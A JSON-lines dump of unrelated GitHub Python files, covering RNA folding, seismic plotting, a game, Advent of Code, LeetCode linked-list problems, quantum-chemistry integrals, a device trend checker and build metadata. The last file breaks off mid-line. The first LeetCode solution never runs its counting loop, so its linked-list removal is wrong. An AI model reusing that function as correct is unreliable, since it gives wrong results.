+ key + '\\n' + value + '\\n')\n tempofile = open(temp_file, 'w')\n tempofile.write('>' + key + '\\n' + value + '\\n')\n tempofile.close()\n shuffled = out(cmd_shuffle)\n ofile.write(shuffled)\n ofile.close()\n # Run RNAfold\n shutil.copyfile(file_name, temp_copy_file)\n in_RNAfold = open(temp_copy_file, 'r')\n out(cmd_fold_cluster)\n # remove/move files\n cmd = ('find . -name \"*.ps\" -delete')\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell = True)\n os.remove(temp_file)\n os.remove(temp_copy_file)\n return\n\ndef doFeatureFile(cluster_csv_file, energy, pvalue, \\\n dict_transcripts, final_csv_file, \\\n final_file):\n # Reading cluster csv file and selecting rows of\n # interest and append them into a list and a list\n # of tuples needed for dicitonary\n df = pd.read_csv(cluster_csv_file)\n df_primary_rows = pd.DataFrame()\n for index, columns in df.iterrows():\n df_primary_rows = df[(df['Primary ID'] == df['Secondary ID']) &\\\n (df['MFE'] <= energy) &\\\n (df['Pvalue'] <= pvalue)]\n cluster_location_list = []\n for index, row in df_primary_rows.iterrows():\n cluster_location_list.append(row['Primary ID'])\n cluster_location_dictionary = {}\n for x in cluster_location_list:\n start_location = (x.split('_'))[1]\n end_location = (x.split('_'))[0]\n cluster_location_dictionary[x] = ((end_location, start_location))\n feature_dict = {}\n count = 0\n while count < 2:\n for loc in cluster_location_dictionary:\n temp_dict = {}\n temp_list = []\n # Iterating through the transcripts dictionary\n for transcript_id, transcript_feature in dict_transcripts.items():\n # Iterating through the each transcript dictionary\n for feature in transcript_feature:\n if int(cluster_location_dictionary[loc][0]) <= int(transcript_feature[feature][0]) and \\\n int(cluster_location_dictionary[loc][0]) >= int(transcript_feature[feature][1]):\n temp_dict.setdefault(transcript_id, [])\n if feature not in temp_dict[transcript_id]:\n temp_dict[transcript_id].append(feature)\n count += 1\n # Iterating through the transcripts dictionary\n for transcript_id, transcript_feature in dict_transcripts.items():\n # Iterating through the each transcript dictionary\n for feature in transcript_feature:\n if int(cluster_location_dictionary[loc][1]) <= int(transcript_feature[feature][0]) and \\\n int(cluster_location_dictionary[loc][1]) >= int(transcript_feature[feature][1]):\n temp_dict.setdefault(transcript_id, [])\n if feature not in temp_dict[transcript_id]:\n temp_dict[transcript_id].append(feature)\n for key, value in temp_dict.items():\n temp_list.append((key, value))\n feature_dict[loc] = temp_list\n count += 1\n # Create final csv file\n df_final = pd.DataFrame()\n df_final['Primary ID'] = df_primary_rows['Primary ID']\n df_final['Sequence'] = df_primary_rows['Sequence']\n df_final['Fold'] = df_primary_rows['Fold']\n df_final['MFE'] = df_primary_rows['MFE']\n df_final['Pvalue'] = df_primary_rows['Pvalue']\n with open (final_csv_file, 'w') as f:\n df_final.to_csv(f, sep='\\t', index = False)\n f.close()\n ofile = open(final_file, 'w')\n for key, value in feature_dict.items():\n ofile.write('>' + key + '\\n' + str(value) + '\\n') \n return \n","repo_name":"mmarto27/MSc-Thesis","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":11966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71162002332","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Apr 8 16:13:19 2020\n\n@author: D. Li (lMU)\n\"\"\"\nfrom pandas import read_csv as rd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom scipy.interpolate import griddata\n\n#%% load data from WaveQLab output\nfolder ='/import/freenas-m-05-seissol/dli/ExaHyPE/TPV5/contour/'\nwaveq_file = folder+'waveq_conf.dat'\nwaveq = np.loadtxt(waveq_file,comments='#',skiprows=16)\n\nx1 = waveq[:,0]/1e3\ny1 = waveq[:,1]/1e3\nar_waveq = waveq[:,2]\n\nnfilter = np.where(ar_waveq<12.1) # filter out 1e9\n\nx1 = x1[nfilter] + 20\ny1 = y1[nfilter]\nar_waveq=ar_waveq[nfilter]\n\npoints1 = np.zeros((len(x1),2))\npoints1[:,0] = np.array(x1[:])\npoints1[:,1] = np.array(y1[:])\n\nxgrid1,ygrid1 = np.mgrid[0:50:100j,0:25:50j]\ngrid_waveq = griddata(points1, ar_waveq, (xgrid1, ygrid1), method='linear')\n\n# %% setup folder and prefix for input and output folder\nmodel = 'fault_out'\nfigout = folder + model+'_contour'+'.png'\n\n# load arrival time data from .csv \nfname = folder + model + '.csv'\nfigout = model + '.png'\ndata1 = rd(fname,sep=',')\nar_all = data1['Q:7'] # arrival time\n\n# set grid data of arrival time\nxgrid,ygrid = np.mgrid[0:40:80j,0:30:60j]\n\nz_all = data1[\"coordinates:2\"]\ny_all = data1[\"coordinates:1\"]\n\npoints = np.zeros((len(z_all),2))\npoints[:,0] = np.array(z_all[:])\npoints[:,1] = np.array(y_all[:])\n\ngrid_z2 = griddata(points, ar_all, (xgrid, ygrid), method='linear')\n\n#%% set 0.5 sec contours of arrival times\ncf = np.linspace(0.5,12.0,num=23)\n\n# plot\nfig,ax = plt.subplots()\n\n# ExaSeis data\ncntr1 = ax.contour(np.transpose(grid_z2),cf,cmap='plasma')\n# WaveQLab data\ncntr2 = ax.contour(np.transpose(grid_waveq),cf,cmap='plasma',linestyles='dashed')\n\nplt.xlabel('fault parallel (km)')\nplt.ylabel('downdip distance (km)')\n\nh1,_ = cntr1.legend_elements()\nh2,_ = cntr2.legend_elements()\nax.legend([h1[0], h2[0]], ['ExaSeis', 'WaveQLab'])\n\n\nplt.ylim(0,30)\nplt.xlim(10,70)\n#plt.show()\nplt.savefig(figout,dpi=100)\n\n","repo_name":"daisy20170101/ExaSeis_postprocessing","sub_path":"scripts/PltContour.py","file_name":"PltContour.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19946851034","text":"print('mons')\nimport random\nimport StoryFactsData as sf\nclass Monster:\n def __init__(self,name,element,description,BaseLevel,finnishing=''):\n #classt is the class it is weak against.\n self.name=name\n self.classt=random.choice(sf.classes)\n self.element=element\n self.desc=description\n self.finish=finnishing\n self.BaseLevel=BaseLevel\n # \\/ arbitrary values\n self.attack=(7 + (BaseLevel))//2\n self.health=5*BaseLevel\n if self.name in sf.Bosses:\n self.health+=50\n if self.name=='Bettasimha':\n self.classt='Champion'\n self.health+=1000\n self.attack+=100\n def regenerate(self):\n if self.name in sf.Bosses:\n self.health+=50\n self.attack=7 + (self.BaseLevel)\n self.health=5*self.BaseLevel\n if self.name=='Bettasimha':\n self.classt='Champion'\n self.health+=1500\n self.attack+=150\n","repo_name":"Bettalion/MyGame","sub_path":"monsters.py","file_name":"monsters.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4184276864","text":"#! /usr/bin/env python\n\nimport pandas as pd\nfrom datetime import datetime, timedelta\n\n\ndef get_timestamp(x):\n timestamp = datetime.strptime(x['Timestamp of event'], '%Y-%m-%d %H:%M')\n return timestamp - timedelta(hours=1)\n\n\ndef get_minute(x):\n return datetime.strftime(x['Timestamp of event'], '%M')\n\n\ndef get_date(x):\n return datetime.strftime(x['Timestamp of event'], '%Y-%m-%d')\n\n\n# read input\nwith open('04-input.txt', 'r') as f:\n content = f.read().split('\\n')\n\n# [1518-09-22 23:50] Guard #2309 begins shift\n\n# create a table\ndf = pd.DataFrame([[event[1:17], event[19:]] for event in content],\n columns=['Timestamp of event', 'Event'])\n\n# sorting by time\ndf['Timestamp of event'] = df.apply(get_timestamp, axis=1)\ndf.sort_values(by='Timestamp of event', ascending=True, inplace=True)\n\n# find the guard ID\ndf['guard_id'] = df['Event'].str.extract(r'Guard #(\\d+)')\n# propagate it forward\ndf['guard_id'].fillna(method='ffill', inplace=True)\n\n# find event booleans\ndf['fell_asleep'] = df['Event'].str.contains(r'falls asleep')\ndf['woke_up'] = df['Event'].str.contains(r'wakes up')\ndf['status'] = df['fell_asleep'] * 1 + df['woke_up'] * 0\n\ndf['Minute of event'] = df.apply(get_minute, axis=1)\ndf['Date of event'] = df.apply(get_date, axis=1)\n\npivoted_df = df.pivot_table(values='status',\n index=['Date of event', 'guard_id'],\n columns=['Minute of event'])\n\npivoted_df.fillna(method='ffill', axis=1, inplace=True)\npivoted_df.reset_index(drop=False, inplace=True)\npivoted_df['total_asleep_min'] = pivoted_df.sum(axis=1)\n\ngrouped_df = pivoted_df.groupby(['guard_id']).agg({'total_asleep_min': 'sum'})\ngrouped_df.sort_values(by='total_asleep_min', ascending=False, inplace=True)\nsleepy_guard = grouped_df.iloc[:1, :].index.values[0]\n\nprint('\\nguard who slept the most:\\n')\nprint(sleepy_guard)\n\nsliced_df = pivoted_df[pivoted_df['guard_id'] == sleepy_guard]\nsliced_df.drop(['Date of event', 'guard_id', 'total_asleep_min'], axis=1)\nprint('\\nminute during which guard most slept:\\n')\nprint(int(sliced_df.sum().idxmax()))\n\nprint('\\nsolution: %s' % (int(sleepy_guard) * int(sliced_df.sum().idxmax())))\n","repo_name":"guidopetri/advent-of-code","sub_path":"2018/04-1.py","file_name":"04-1.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33134756164","text":"'''\n 给你一个链表,删除链表的倒数第 n 个结点,并且返回链表的头结点。\n 进阶:你能尝试使用一趟扫描实现吗?\n 示例 1:\n 输入:head = [1,2,3,4,5], n = 2\n 输出:[1,2,3,5]\n\n 示例 2:\n 输入:head = [1], n = 1\n 输出:[]\n\n 示例 3:\n 输入:head = [1,2], n = 1\n 输出:[1]\n'''\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution1:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n '''\n 思路1:\n (1)首先我们遍历一遍链表,得到链表的总长度count\n (2)然后将cur和pre遍历到相应位置count-n,此时cur所指向的位置就是我们要删除的倒数第n个节点。\n (3)设置dummy节点,防止删除第一个节点时报错\n '''\n dummy = ListNode(0)\n dummy.next = head\n pre = dummy\n cur = head\n\n count = 0\n while count:\n cur = cur.next\n count += 1\n cur = head\n for i in range(count - n):\n pre = cur\n cur = cur.next\n pre.next = cur.next # 若删除的为第一个节点,pre为None,没有next方法,会报错,设置dummy\n return dummy.next\n\nclass Solution2:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n '''\n 思路2:\n (1)可以利用两个指针之间得间隔,当cur指向None即出界时,\n 利用距离为n的节点之前的pre节点来完成这道题目,pre.next = pre. next.next\n (2)注意特殊情况,删除的为第一个节点时,这时我们要设置一个dummy节点\n '''\n dummy = ListNode(0)\n dummy.next = head\n cur = head\n pre = dummy\n\n for i in range(n):\n cur = cur.next\n while cur:\n pre = pre.next\n cur = cur.next\n return pre.next","repo_name":"wwwwkd/Data-Structure-and-Algorithm","sub_path":"Link/leetcode19.删除链表的倒数第N个节点.py","file_name":"leetcode19.删除链表的倒数第N个节点.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72790779930","text":"def quicksort(arr):\n if len(arr) <= 1:\n return arr\n\n pvot = arr[len(arr) // 2]\n left = [x for x in arr if x < pvot]\n middle = [x for x in arr if x == pvot]\n right = [x for x in arr if x > pvot]\n\n return quicksort(left) + middle + quicksort(right)\n","repo_name":"jiaweim/python-study-trails","sub_path":"m_python/basics/t_quicksort.py","file_name":"t_quicksort.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15345288696","text":"import abc\nimport numpy as np\n\nfrom time_propagator0.setup_daltonproject import (\n compute_plane_wave_integrals_from_molcas,\n)\n\n\nclass IntegralContainer(metaclass=abc.ABCMeta):\n def __init__(self, integrals, C=None, C_tilde=None):\n self._integrals = integrals\n self._C = C\n self._C_tilde = C_tilde\n self._l = (integrals[\"cosp,0\"]).shape[-1]\n\n @property\n def l(self):\n return self._l\n\n @property\n def C(self):\n return self._C\n\n @C.setter\n def C(self, C):\n self._C = C\n\n @property\n def C_tilde(self):\n return self._C_tilde\n\n @C_tilde.setter\n def C_tilde(self, C_tilde):\n self._C_tilde = C_tilde\n\n def change_basis(self,C=None,C_tilde=None):\n if C is None:\n for el in self._integrals:\n self._integrals[el] = self.C_tilde @ self._integrals[el] @ self.C\n self.C = np.eye(len(self.C))\n self.C_tilde = np.eye(len(self.C_tilde))\n else:\n for el in self._integrals:\n self._integrals[el] = C_tilde @ self._integrals[el] @ C\n\n @abc.abstractmethod\n def __getitem__(self, index):\n pass\n\n\nclass IntegralContainerFixedOrbitals(IntegralContainer):\n def __getitem__(self, index):\n return self._integrals[index]\n\n\nclass IntegralContainerOrbitalAdaptive(IntegralContainer):\n def __getitem__(self, index):\n return self.C_tilde @ self._integrals[index] @ self.C\n\n\ndef get_integrals_from_molcas(\n molecule,\n basis,\n omega,\n k_direction,\n return_s=False,\n custom_basis=False,\n):\n ma = compute_plane_wave_integrals_from_molcas(\n molecule, basis, omega, k_direction, custom_basis=custom_basis\n )\n\n cos2 = ma.cos2\n sin2 = ma.sin2\n\n l = len(cos2)\n cosp = np.zeros((3, l, l), dtype=complex)\n sinp = np.zeros((3, l, l), dtype=complex)\n cosp[0] = ma.cosp(0)\n cosp[1] = ma.cosp(1)\n cosp[2] = ma.cosp(2)\n sinp[0] = ma.sinp(0)\n sinp[1] = ma.sinp(1)\n sinp[2] = ma.sinp(2)\n\n return (cosp, sinp, cos2, sin2) if not return_s else (cosp, sinp, cos2, sin2, ma.s)\n\n\ndef setup_plane_wave_integrals_from_molcas(\n pulse_inputs,\n molecule,\n basis,\n quadratic_terms=False,\n cross_terms=False,\n compute_A=False,\n custom_basis=False,\n):\n n_pulses = len(pulse_inputs)\n\n integrals = {}\n\n for m in range(n_pulses):\n k_direction = pulse_inputs[m][\"k_direction\"]\n omega = pulse_inputs[m][\"omega\"]\n\n cosp, sinp, cos2, sin2, s = get_integrals_from_molcas(\n molecule,\n basis,\n omega,\n k_direction,\n return_s=True,\n custom_basis=custom_basis,\n )\n\n integrals[f\"cosp,{m}\"] = cosp\n integrals[f\"sinp,{m}\"] = sinp\n\n if quadratic_terms:\n integrals[f\"cos+,{m}{m}\"] = cos2\n integrals[f\"sin+,{m}{m}\"] = sin2\n integrals[f\"cos-,{m}{m}\"] = s\n integrals[f\"sin-,{m}{m}\"] = np.zeros_like(s)\n\n if compute_A:\n cosp, sinp, cos2, sin2 = get_integrals_from_molcas(\n molecule, basis, omega / 2, k_direction, custom_basis=custom_basis\n )\n integrals[f\"cos,{m}\"] = cos2\n integrals[f\"sin,{m}\"] = sin2\n\n if cross_terms:\n pulse_nums = np.arange(n_pulses)\n for m in pulse_nums:\n for n in pulse_nums[pulse_nums > m]:\n\n k_direction_m = pulse_inputs[m][\"k_direction\"]\n omega_m = pulse_inputs[m][\"omega\"]\n\n k_direction_n = pulse_inputs[n][\"k_direction\"]\n omega_n = pulse_inputs[n][\"omega\"]\n\n ck_m = omega_m * np.array(k_direction_m)\n ck_n = omega_n * np.array(k_direction_n)\n ck_pl = ck_m + ck_n\n ck_mi = ck_m - ck_n\n omega_pl = (1 / 2) * np.linalg.norm(ck_pl)\n omega_mi = (1 / 2) * np.linalg.norm(ck_mi)\n k_direction_pl = ck_pl / np.linalg.norm(ck_pl)\n k_direction_mi = ck_mi / np.linalg.norm(ck_mi)\n cosp, sinp, cos2, sin2 = get_integrals_from_molcas(\n molecule, basis, omega_pl, k_direction_pl, custom_basis=custom_basis\n )\n integrals[f\"cos+,{m}{n}\"] = cos2\n integrals[f\"cos+,{n}{m}\"] = cos2\n integrals[f\"sin+,{m}{n}\"] = sin2\n integrals[f\"sin+,{n}{m}\"] = sin2\n\n cosp, sinp, cos2, sin2 = get_integrals_from_molcas(\n molecule, basis, omega_mi, k_direction_mi, custom_basis=custom_basis\n )\n integrals[f\"cos-,{m}{n}\"] = cos2\n integrals[f\"cos-,{n}{m}\"] = cos2\n integrals[f\"sin-,{m}{n}\"] = sin2\n integrals[f\"sin-,{n}{m}\"] = -sin2\n\n return integrals\n","repo_name":"HyQD/time-propagator","sub_path":"time_propagator0/field_interaction/plane_wave_integrals_containers.py","file_name":"plane_wave_integrals_containers.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41237601160","text":"import pandas as pd\nimport json\nimport os\nimport glob\nimport csv\nimport urllib.request as url\nimport difflib\nimport sys\nimport time\nimport itertools\nimport threading\nimport socket\nimport subprocess\nimport shutil\nfrom urllib.error import HTTPError, URLError\n\nprocessDone = False\ndef loadJsonData (URLvars):\n try:\n jsondata = json.loads(url.urlopen(URLvars,timeout=20).read().decode())\n time.sleep(1)\n return jsondata\n except HTTPError as error:\n print(\"HTTP Timeout!\")\n processDone = True\n exit()\n\n#here is the animation\ndef animate():\n for c in itertools.cycle(['|', '/', '-', '\\\\']):\n if processDone:\n sys.stdout.write('\\r ')\n break\n sys.stdout.write('\\r ' + c)\n sys.stdout.flush()\n time.sleep(0.1)\n sys.stdout.write('\\r ')\n\ndef prepend_line(file_name, line):\n \"\"\" Insert given string as a new line at the beginning of a file \"\"\"\n # define name of temporary dummy file\n dummy_file = file_name + '.bak'\n # open original file in read mode and dummy file in write mode\n with open(file_name, 'r') as read_obj, open(dummy_file, 'w') as write_obj:\n # Write given line to the dummy file\n write_obj.write(line + '\\n')\n # Read lines from original file one by one and append them to the dummy file\n for line in read_obj:\n write_obj.write(line)\n # remove original file\n os.remove(file_name)\n # Rename dummy file as the original file\n os.rename(dummy_file, file_name)\n\n\nIP= sys.argv[1]\n#IP= \"192.168.5.123\";\nURLvars=\"http://\"+IP+\"/get_trends.cgi\"\njsonTrendPath = \"jsontrend\"\nif os.path.exists(jsonTrendPath):\n shutil.rmtree(jsonTrendPath, ignore_errors=True)\n\nos.mkdir(jsonTrendPath)\n\nprint(\"Loading trends from \"+ IP + \"\\n\")\nt = threading.Thread(target=animate)\nt.start()\njsondata = loadJsonData(URLvars)\nprocessDone=True\ntrendsNameArray = jsondata['query']['trends']\n\nprint(\"\\nWriting cgi_json_data.csv\\n\")\ndf = pd.DataFrame(jsondata['trends'])\ndf = df['filename']\nfor index in df.index:\n df_track = pd.DataFrame(jsondata['trends'][index]['track'])\n df_track['id'] = df_track['id'].str.pad(32, side='right', fillchar=' ')\n df_track.to_csv(jsonTrendPath+\"/\"+df[index],sep=';',header=False,index=False)\n prepend_line(jsonTrendPath+\"/\"+df[index],'L')\n\nprint(\"Downloading original files \\n\")\ntrendPath = \"customtrend\"\nif os.path.exists(trendPath):\n shutil.rmtree(trendPath, ignore_errors=True)\n\ntry:\n subprocess.call([\"rsync\", \"-Havx\", \"root@\"+IP+\":/local/data/\"+trendPath, \"./\"])\n# fRes = subprocess.call([\"rsync\", \"-Havx\", \"root@192.168.0.111:/local/data/\"+trendPath, \"./\"])\nexcept subprocess.CalledProcessError as rsyncRes:\n print(\"error code\", rsyncRes.returncode, rsyncRes.output)\n\ndifferenceFile = \"data_difference_trends.diff\"\nprint(\"Looking for differences \\n\")\nfor index in df.index:\n with open(trendPath + '/' + df[index], 'r') as t1, open(jsonTrendPath+\"/\"+df[index], 'r') as t2:\n fileone = t1.readlines()\n filetwo = t2.readlines()\n fileone = [line.replace(' ', '') for line in fileone]\n filetwo = [line.replace(' ', '') for line in filetwo]\n\n with open(differenceFile, 'a') as outFile:\n for line in difflib.unified_diff(fileone, filetwo, fromfile=trendPath + '/' + df[index], tofile=jsonTrendPath+\"/\"+df[index]):\n outFile.write(line)\n\nif not os.stat(differenceFile).st_size == 0:\n print(\"Done! Differences are loaded in \"+ differenceFile)\nelse:\n print(\"Done! No differences were found!\")\n #clean\n shutil.rmtree(trendPath, ignore_errors=True)\n shutil.rmtree(jsonTrendPath, ignore_errors=True)\n os.remove(differenceFile)\n","repo_name":"MECTsrl/imx_mect","sub_path":"projects/testing/cgi_trends_compare.py","file_name":"cgi_trends_compare.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"21862585640","text":"class Udacian:\n def __init__(self, name, city,enrollment,nanodegree,status):\n self.name = name\n self.city = city\n self.enrollment = enrollment\n self.nanodegree = nanodegree\n self.status = status\n\n def print_udacian(self):\n print(self.name+\" \"+self.city+\" \"+self.nanodegree)\n\nu = Udacian(\"elaaf\",\"jeddah\",\"enrollment\",\"full stack\",\"s\")\nu.print_udacian()\n","repo_name":"Lo0ofah/udacian","sub_path":"c2.py","file_name":"c2.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27837826233","text":"from typing import Dict, Optional, List, Tuple\nimport urllib.parse\nimport yaml\nfrom collections import OrderedDict\nfrom dockerfile_parse import DockerfileParser\nimport pathlib\nimport json\nimport traceback\n\nfrom .pushd import Dir\nfrom .distgit import ImageDistGitRepo, RPMDistGitRepo, DistGitRepo\nfrom . import exectools\nfrom . import logutil\nfrom . import brew\n\nfrom .model import Model, Missing\n\n#\n# These are used as labels to index selection of a subclass.\n#\nDISTGIT_TYPES = {\n 'image': ImageDistGitRepo,\n 'rpm': RPMDistGitRepo\n}\n\nCONFIG_MODES = [\n 'enabled', # business as usual\n 'disabled', # manually disabled from automatically building\n 'wip', # Work in Progress, do not build\n]\n\nCONFIG_MODE_DEFAULT = CONFIG_MODES[0]\n\n\nclass Metadata(object):\n\n def __init__(self, meta_type, runtime, data_obj: Dict, commitish: Optional[str] = None):\n \"\"\"\n :param: meta_type - a string. Index to the sub-class <'rpm'|'image'>.\n :param: runtime - a Runtime object.\n :param: name - a filename to load as metadata\n :param: commitish: If not None, build from the specified upstream commit-ish instead of the branch tip.\n \"\"\"\n self.meta_type = meta_type\n self.runtime = runtime\n self.data_obj = data_obj\n self.config_filename = data_obj.filename\n self.full_config_path = data_obj.path\n self.commitish = commitish\n\n # URL and branch of public upstream source are set later by Runtime.resolve_source()\n self.public_upstream_url = None\n self.public_upstream_branch = None\n\n # Some config filenames have suffixes to avoid name collisions; strip off the suffix to find the real\n # distgit repo name (which must be combined with the distgit namespace).\n # e.g. openshift-enterprise-mediawiki.apb.yml\n # distgit_key=openshift-enterprise-mediawiki.apb\n # name (repo name)=openshift-enterprise-mediawiki\n\n self.distgit_key = data_obj.key\n self.name = self.distgit_key.split('.')[0] # Split off any '.apb' style differentiator (if present)\n\n self.runtime.logger.debug(\"Loading metadata from {}\".format(self.full_config_path))\n\n self.config = Model(data_obj.data)\n\n self.mode = self.config.get('mode', CONFIG_MODE_DEFAULT).lower()\n if self.mode not in CONFIG_MODES:\n raise ValueError('Invalid mode for {}'.format(self.config_filename))\n\n self.enabled = (self.mode == CONFIG_MODE_DEFAULT)\n\n # Basic config validation. All images currently required to have a name in the metadata.\n # This is required because from.member uses these data to populate FROM in images.\n # It would be possible to query this data from the distgit Dockerflie label, but\n # not implementing this until we actually need it.\n assert (self.config.name is not Missing)\n\n # Choose default namespace for config data\n if meta_type == \"image\":\n self.namespace = \"containers\"\n else:\n self.namespace = \"rpms\"\n\n # Allow config data to override\n if self.config.distgit.namespace is not Missing:\n self.namespace = self.config.distgit.namespace\n\n self.qualified_name = \"%s/%s\" % (self.namespace, self.name)\n self.qualified_key = \"%s/%s\" % (self.namespace, self.distgit_key)\n\n # Includes information to identify the metadata being used with each log message\n self.logger = logutil.EntityLoggingAdapter(logger=self.runtime.logger, extra={'entity': self.qualified_key})\n\n self._distgit_repo = None\n\n def save(self):\n self.data_obj.data = self.config.primitive()\n self.data_obj.save()\n\n def distgit_remote_url(self):\n pkgs_host = self.runtime.group_config.urls.get('pkgs_host', 'pkgs.devel.redhat.com')\n # rhpkg uses a remote named like this to pull content from distgit\n if self.runtime.user:\n return f'ssh://{self.runtime.user}@{pkgs_host}/{self.qualified_name}'\n return f'ssh://{pkgs_host}/{self.qualified_name}'\n\n def distgit_repo(self, autoclone=True) -> DistGitRepo:\n if self._distgit_repo is None:\n self._distgit_repo = DISTGIT_TYPES[self.meta_type](self, autoclone=autoclone)\n return self._distgit_repo\n\n def branch(self):\n if self.config.distgit.branch is not Missing:\n return self.config.distgit.branch\n return self.runtime.branch\n\n def build_root_tag(self):\n return '{}-build'.format(self.branch())\n\n def candidate_brew_tag(self):\n return '{}-candidate'.format(self.branch())\n\n def candidate_brew_tags(self):\n return [self.candidate_brew_tag()]\n\n def get_arches(self):\n \"\"\"\n :return: Returns the list of architecture this image/rpm should build for. This is an intersection\n of config specific arches & globally enabled arches in group.yml\n \"\"\"\n if self.config.arches:\n ca = self.config.arches\n intersection = list(set(self.runtime.get_global_arches()) & set(ca))\n if len(intersection) != len(ca):\n self.logger.info(f'Arches are being pruned by group.yml. Using computed {intersection} vs config list {ca}')\n if not intersection:\n raise ValueError(f'No arches remained enabled in {self.qualified_key}')\n return intersection\n else:\n return list(self.runtime.get_global_arches())\n\n def cgit_url(self, filename):\n rev = self.branch()\n ret = \"/\".join((self.runtime.group_config.urls.cgit, self.qualified_name, \"plain\", filename))\n if rev is not None:\n ret = \"{}?h={}\".format(ret, rev)\n return ret\n\n def fetch_cgit_file(self, filename):\n url = self.cgit_url(filename)\n req = exectools.retry(\n 3, lambda: urllib.request.urlopen(url),\n check_f=lambda req: req.code == 200)\n return req.read()\n\n def get_latest_build(self, default=-1):\n \"\"\"\n :param default: A value to return if no latest is found (if not specified, an exception will be thrown)\n :return: Returns the most recent build object from koji.\n Example https://gist.github.com/jupierce/e6bfd98a3777ae5d56e0f7e92e5db0c9\n \"\"\"\n component_name = self.get_component_name()\n with self.runtime.pooled_koji_client_session() as koji_api:\n builds = koji_api.getLatestBuilds(self.candidate_brew_tag(), package=component_name)\n if not builds:\n if default != -1:\n self.logger.warning(\"No builds detected for using tag: %s\" % (self.candidate_brew_tag()))\n return default\n raise IOError(\"No builds detected for %s using tag: %s\" % (self.qualified_name, self.candidate_brew_tag()))\n return builds[0]\n\n def get_latest_build_info(self, default=-1):\n \"\"\"\n Queries brew to determine the most recently built release of the component\n associated with this image. This method does not rely on the \"release\"\n label needing to be present in the Dockerfile.\n :param default: A value to return if no latest is found (if not specified, an exception will be thrown)\n :return: A tuple: (component name, version, release); e.g. (\"registry-console-docker\", \"v3.6.173.0.75\", \"1\")\n \"\"\"\n build = self.get_latest_build(default=default)\n if default != -1 and build == default:\n return default\n return build['name'], build['version'], build['release']\n\n def get_component_name(self, default=-1) -> str:\n \"\"\"\n :param default: If the component name cannot be determined,\n :return: Returns the component name of the image. This is the name in the nvr\n that brew assigns to this image's build.\n \"\"\"\n raise IOError('Subclass must implement')\n\n def needs_rebuild(self) -> Tuple[bool, str]:\n \"\"\"\n Check whether the commit that we recorded in the distgit content (according to cgit)\n matches the commit of the source (according to git ls-remote) and has been built\n (according to brew).\n Returns: (, message). If True, message describing the details is returned. If False,\n None is returned.\n \"\"\"\n component_name = self.get_component_name(default='')\n if not component_name:\n # This can happen for RPMs if they have never been rebased into\n # distgit.\n return True, 'Could not find component name; assuming never built'\n\n # latest_build_creation_event_id = latest_build['creation_event_id']\n # all candidate Brew tags configured for this component. e.g. [rhaos-4.7-rhel-8-candidate, rhaos-4.7-rhel-7-candidate]\n candidate_tags = self.candidate_brew_tags()\n with self.runtime.pooled_koji_client_session() as koji_api:\n # latest builds of this component in all candidate Brew tags (e.g. [rhaos-4.7-rhel-8-candidate, rhaos-4.7-rhel-7-candidate])\n build_lists = brew.get_latest_builds([(tag, component_name) for tag in candidate_tags], None, None, koji_api)\n latest_builds = [builds[0] if builds else None for builds in build_lists]\n tags_without_builds = {tag for tag, _ in filter(lambda tag_build: tag_build[1] is None, zip(candidate_tags, latest_builds))}\n if tags_without_builds:\n return True, f'Component {component_name} has never been built against {tags_without_builds}'\n\n # latest_build is the eldest among those latest builds for different targets\n latest_build = min(latest_builds, key=lambda build: build['creation_event_id'])\n latest_build_creation_event_id = latest_build['creation_event_id']\n # getEvent returns something like {'id': 31825801, 'ts': 1591039601.2667}\n latest_build_creation_ts_seconds = int(koji_api.getEvent(latest_build_creation_event_id)['ts'])\n # Log scan-sources coordinates throughout to simplify setting up scan-sources\n # function tests to reproduce real-life scenarios.\n self.logger.debug(f'scan-sources coordinate: latest_build: {latest_build}')\n self.logger.debug(f'scan-sources coordinate: latest_build_creation_ts_seconds: {latest_build_creation_ts_seconds}')\n\n dgr = self.distgit_repo()\n with Dir(dgr.distgit_dir):\n dg_commit, _ = exectools.cmd_assert('git rev-parse HEAD', strip=True)\n self.logger.debug(f'scan-sources coordinate: dg_commit: {dg_commit}')\n ts, _ = exectools.cmd_assert('git show -s --format=%ct HEAD', strip=True)\n distgit_head_commit_ts_seconds = int(ts)\n self.logger.debug(f'scan-sources coordinate: distgit_head_commit_ts_seconds: {distgit_head_commit_ts_seconds}')\n\n one_hour = (1 * 60 * 60) # in milliseconds\n\n if not dgr.has_source():\n if distgit_head_commit_ts_seconds > latest_build_creation_ts_seconds:\n # Two options:\n # 1. A user has made a commit to this dist-git only branch and there has been no build attempt\n # 2. We've already tried a build and the build failed.\n # To balance these two options, if the diff > 1 hour, request a build.\n if (distgit_head_commit_ts_seconds - latest_build_creation_ts_seconds) > one_hour:\n return True, 'Distgit only repo commit is at least one hour older than most recent build'\n return False, 'Distgit only repo commit is older than most recent build'\n\n # We have source.\n with Dir(dgr.source_path()):\n upstream_commit_hash, _ = 